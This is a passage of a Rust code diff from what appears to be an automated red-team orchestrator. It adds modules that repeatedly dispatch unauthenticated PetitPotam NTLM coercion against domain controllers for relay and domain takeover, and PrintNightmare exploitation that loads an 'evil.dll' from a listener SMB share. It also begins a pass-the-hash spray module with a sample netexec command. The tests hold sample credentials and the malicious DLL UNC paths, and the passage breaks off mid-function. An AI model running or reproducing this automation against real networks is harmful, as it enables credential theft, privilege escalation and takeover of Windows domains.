+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "policy:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into());
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_PASSWORD_POLICY, "policy:contoso.local".into());
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam credential available
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "policy:contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs
new file mode 100644
index 00000000..e67ce2e8
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/petitpotam_unauth.rs
@@ -0,0 +1,323 @@
+//! auto_petitpotam_unauth -- attempt unauthenticated PetitPotam (MS-EFSRPC)
+//! coercion against DCs.
+//!
+//! On unpatched systems, EfsRpcOpenFileRaw allows unauthenticated NTLM coercion.
+//! Microsoft patched the unauthenticated path in August 2021 (CVE-2021-36942;
+//! see also the KB5005413 relay-mitigation guidance), but many environments
+//! remain exposed. The check requires no credentials, only a listener IP and
+//! DC target.
+//!
+//! If successful, the captured DC machine account NTLM auth can be relayed to
+//! LDAP or ADCS for domain takeover.
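+//!
+//! The coercion works by asking the DC to open a file on our listener; a
+//! sketch of the UNC path PetitPotam-style tools pass to EfsRpcOpenFileRaw
+//! (share and file name are arbitrary placeholders):
+//!
+//! ```ignore
+//! fn coercion_unc(listener_ip: &str) -> String {
+//!     // The DC authenticates to this path, handing us machine-account
+//!     // NTLM authentication that we can relay.
+//!     format!("\\\\{listener_ip}\\share\\x")
+//! }
+//! assert_eq!(coercion_unc("192.168.58.50"), "\\\\192.168.58.50\\share\\x");
+//! ```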
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect PetitPotam unauth work items from current state.
+///
+/// Pure logic extracted from `auto_petitpotam_unauth` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_petitpotam_unauth_work(state: &StateInner, listener: &str) -> Vec<PetitPotamWork> {
+ state
+ .domain_controllers
+ .iter()
+ .filter(|(_, dc_ip)| dc_ip.as_str() != listener)
+ .filter(|(_, dc_ip)| {
+ let dedup_key = format!("petitpotam_unauth:{dc_ip}");
+ !state.is_processed(DEDUP_PETITPOTAM_UNAUTH, &dedup_key)
+ })
+ .map(|(domain, dc_ip)| PetitPotamWork {
+ dedup_key: format!("petitpotam_unauth:{dc_ip}"),
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ listener: listener.to_string(),
+ })
+ .collect()
+}
+
+/// Attempts unauthenticated PetitPotam against each DC once.
+/// Interval: 45s.
+pub async fn auto_petitpotam_unauth(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("petitpotam_unauth") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+        let work: Vec<PetitPotamWork> = {
+ let state = dispatcher.state.read().await;
+ collect_petitpotam_unauth_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "petitpotam_unauthenticated",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "listener_ip": item.listener,
+ });
+
+ let priority = dispatcher.effective_priority("petitpotam_unauth");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Unauthenticated PetitPotam coercion dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PETITPOTAM_UNAUTH, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PETITPOTAM_UNAUTH, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(dc = %item.dc_ip, "PetitPotam unauth deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch PetitPotam unauth");
+ }
+ }
+ }
+ }
+}
+
+struct PetitPotamWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ listener: String,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("petitpotam_unauth:{}", "192.168.58.10");
+ assert_eq!(key, "petitpotam_unauth:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PETITPOTAM_UNAUTH, "petitpotam_unauth");
+ }
+
+ #[test]
+ fn skips_self_listener() {
+ let dc_ip = "192.168.58.50";
+ let listener = "192.168.58.50";
+ assert_eq!(dc_ip, listener);
+ }
+
+ #[test]
+ fn no_cred_required() {
+ // PetitPotam unauth works without credentials
+ let _payload = serde_json::json!({
+ "technique": "petitpotam_unauthenticated",
+ "target_ip": "192.168.58.10",
+ "listener_ip": "192.168.58.50",
+ });
+ // No credential field needed
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let payload = serde_json::json!({
+ "technique": "petitpotam_unauthenticated",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "listener_ip": "192.168.58.50",
+ });
+ assert_eq!(payload["technique"], "petitpotam_unauthenticated");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert!(payload.get("credential").is_none());
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let work = PetitPotamWork {
+ dedup_key: "petitpotam_unauth:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ listener: "192.168.58.50".into(),
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.listener, "192.168.58.50");
+ }
+
+ #[test]
+ fn dedup_key_based_on_dc_ip() {
+ let dc_ip = "192.168.58.10";
+ let key = format!("petitpotam_unauth:{dc_ip}");
+ assert_eq!(key, "petitpotam_unauth:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_dc() {
+ let key1 = format!("petitpotam_unauth:{}", "192.168.58.10");
+ let key2 = format!("petitpotam_unauth:{}", "192.168.58.20");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn listener_excluded_from_targets() {
+ let dc_ip = "192.168.58.10";
+ let listener = "192.168.58.50";
+ assert_ne!(dc_ip, listener, "DC should not be the listener");
+
+ let self_target_dc = "192.168.58.50";
+ assert_eq!(self_target_dc, listener, "Self-targeting should be skipped");
+ }
+
+ // --- collect_petitpotam_unauth_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_dcs_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_dc_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "petitpotam_unauth:192.168.58.10");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ }
+
+ #[test]
+ fn collect_no_credentials_still_produces_work() {
+ // PetitPotam unauth does NOT require credentials
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_skips_dc_matching_listener() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.50".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.mark_processed(
+ DEDUP_PETITPOTAM_UNAUTH,
+ "petitpotam_unauth:192.168.58.10".into(),
+ );
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.mark_processed(
+ DEDUP_PETITPOTAM_UNAUTH,
+ "petitpotam_unauth:192.168.58.10".into(),
+ );
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_petitpotam_unauth_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/print_nightmare.rs b/ares-cli/src/orchestrator/automation/print_nightmare.rs
new file mode 100644
index 00000000..868eb8cf
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/print_nightmare.rs
@@ -0,0 +1,477 @@
+//! auto_print_nightmare -- exploit CVE-2021-1675 (PrintNightmare) when
+//! conditions are met.
+//!
+//! PrintNightmare exploits the Print Spooler service to achieve remote code
+//! execution. Requires: valid credentials, target with Print Spooler running
+//! (most Windows hosts by default), and a writable SMB share for the DLL.
+//!
+//! This module dispatches `printnightmare` against hosts where we have
+//! credentials but NOT admin access, since it is a privilege-escalation
+//! technique.
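+//!
+//! The DLL must be reachable as a UNC path on our SMB share; a minimal
+//! sketch of the expected shape (share and file name are placeholders
+//! matching the tests below):
+//!
+//! ```ignore
+//! fn dll_unc(listener_ip: &str) -> String {
+//!     format!("\\\\{listener_ip}\\share\\evil.dll")
+//! }
+//! assert_eq!(
+//!     dll_unc("192.168.58.50"),
+//!     "\\\\192.168.58.50\\share\\evil.dll"
+//! );
+//! ```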
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect PrintNightmare work items from state (pure logic, no async).
+fn collect_print_nightmare_work(
+ state: &StateInner,
+ listener: &str,
+ dll_path: &str,
+) -> Vec<PrintNightmareWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Target all discovered hosts (DCs + member servers)
+ for host in &state.hosts {
+ let ip = &host.ip;
+
+ // Skip if we already tried PrintNightmare on this host
+ if state.is_processed(DEDUP_PRINTNIGHTMARE, ip) {
+ continue;
+ }
+
+ // Skip hosts where we already have admin (secretsdump handles those)
+ if state.is_processed(DEDUP_SECRETSDUMP, ip) {
+ continue;
+ }
+
+ // Infer domain from hostname (e.g. "dc01.contoso.local" -> "contoso.local")
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first());
+
+ let cred = match cred {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(PrintNightmareWork {
+ target_ip: ip.clone(),
+ hostname: host.hostname.clone(),
+ domain: domain.clone(),
+ listener: listener.to_string(),
+ dll_path: dll_path.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Monitors for PrintNightmare exploitation opportunities.
+/// Only targets hosts we don't already have admin on.
+/// Interval: 45s.
+pub async fn auto_print_nightmare(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("printnightmare") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue, // need listener for DLL hosting
+ };
+
+ // PrintNightmare requires a UNC path to a hosted malicious DLL. Without
+ // pre-staged SMB share + payload infra, dispatching is guaranteed to
+ // fail on the worker (cve_exploits.rs requires `dll_path`). Skip
+ // cleanly when not configured rather than emitting failed tasks.
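+        // Example (hypothetical value):
+        //   ARES_PRINTNIGHTMARE_DLL='\\192.168.58.50\share\evil.dll'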
+ let dll_path = match std::env::var("ARES_PRINTNIGHTMARE_DLL").ok() {
+ Some(path) if !path.is_empty() => path,
+ _ => continue,
+ };
+
+        let work: Vec<PrintNightmareWork> = {
+ let state = dispatcher.state.read().await;
+ collect_print_nightmare_work(&state, &listener, &dll_path)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "printnightmare",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "listener_ip": item.listener,
+ "dll_path": item.dll_path,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("printnightmare");
+ match dispatcher
+ .throttled_submit("exploit", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "PrintNightmare (CVE-2021-1675) exploitation dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PRINTNIGHTMARE, item.target_ip.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PRINTNIGHTMARE, &item.target_ip)
+ .await;
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "PrintNightmare task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch PrintNightmare");
+ }
+ }
+ }
+ }
+}
+
+struct PrintNightmareWork {
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ listener: String,
+ dll_path: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PRINTNIGHTMARE, "printnightmare");
+ }
+
+ #[test]
+ fn dedup_key_is_target_ip() {
+ let ip = "192.168.58.22";
+ assert_eq!(ip, "192.168.58.22");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "dc01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "dc01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "printnightmare",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "listener_ip": "192.168.58.50",
+ "dll_path": "\\\\192.168.58.50\\share\\evil.dll",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "printnightmare");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["dll_path"], "\\\\192.168.58.50\\share\\evil.dll");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = PrintNightmareWork {
+ target_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ listener: "192.168.58.50".into(),
+ dll_path: "\\\\192.168.58.50\\share\\evil.dll".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.target_ip, "192.168.58.22");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn domain_from_multi_level_hostname() {
+ let hostname = "web01.dmz.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "dmz.contoso.local");
+ }
+
+ #[test]
+ fn domain_from_uppercase_hostname() {
+ let hostname = "DC01.CONTOSO.LOCAL";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ // --- collect_print_nightmare_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_host_with_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ assert_eq!(work[0].dll_path, "\\\\192.168.58.50\\share\\evil.dll");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_printnightmare() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_PRINTNIGHTMARE, "192.168.58.22".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_already_secretsdumped_host() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.22".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fab_user", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("con_user", "contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "con_user");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_cred_for_bare_hostname() {
+ let mut state = StateInner::new("test".into());
+ state.hosts.push(make_host("192.168.58.22", "srv01"));
+ state
+ .credentials
+ .push(make_cred("fallback", "contoso.local"));
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fallback");
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[test]
+ fn collect_multiple_hosts_mixed() {
+ let mut state = StateInner::new("test".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "ws01.fabrikam.local"));
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ // Mark second host as already secretsdumped
+ state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into());
+ let work = collect_print_nightmare_work(
+ &state,
+ "192.168.58.50",
+ "\\\\192.168.58.50\\share\\evil.dll",
+ );
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_key_format_validation() {
+ // PrintNightmare uses the raw target_ip as its dedup key: no
+ // "pth:"/"rdp:"-style prefix and no port suffix.
+ let dedup_key = "192.168.58.10";
+ assert!(!dedup_key.contains(':'));
+ assert!(!dedup_key.is_empty());
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/pth_spray.rs b/ares-cli/src/orchestrator/automation/pth_spray.rs
new file mode 100644
index 00000000..9641568d
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/pth_spray.rs
@@ -0,0 +1,788 @@
+//! auto_pth_spray -- pass-the-hash spray using dumped NTLM hashes.
+//!
+//! After secretsdump extracts NTLM hashes, this module sprays them across
+//! hosts to find additional admin access. Uses netexec/crackmapexec with
+//! NTLM hashes instead of passwords for lateral movement validation.
+//!
+//! This is distinct from credential_reuse (which tests passwords) and
+//! secretsdump (which dumps from owned hosts). PTH spray tests hash-based
+//! auth against non-owned hosts.
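+//!
+//! Illustrative shape of the resulting worker invocation (a hedged sketch;
+//! the exact tool and flags are chosen by the lateral worker, not here):
+//!
+//! ```text
+//! netexec smb 192.168.58.22 -u admin -H aad3b435b51404eeaad3b435b51404ee -d contoso.local
+//! ```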
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Dispatches pass-the-hash spray against non-owned hosts using dumped NTLM hashes.
+/// Interval: 45s.
+pub async fn auto_pth_spray(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("pth_spray") {
+ continue;
+ }
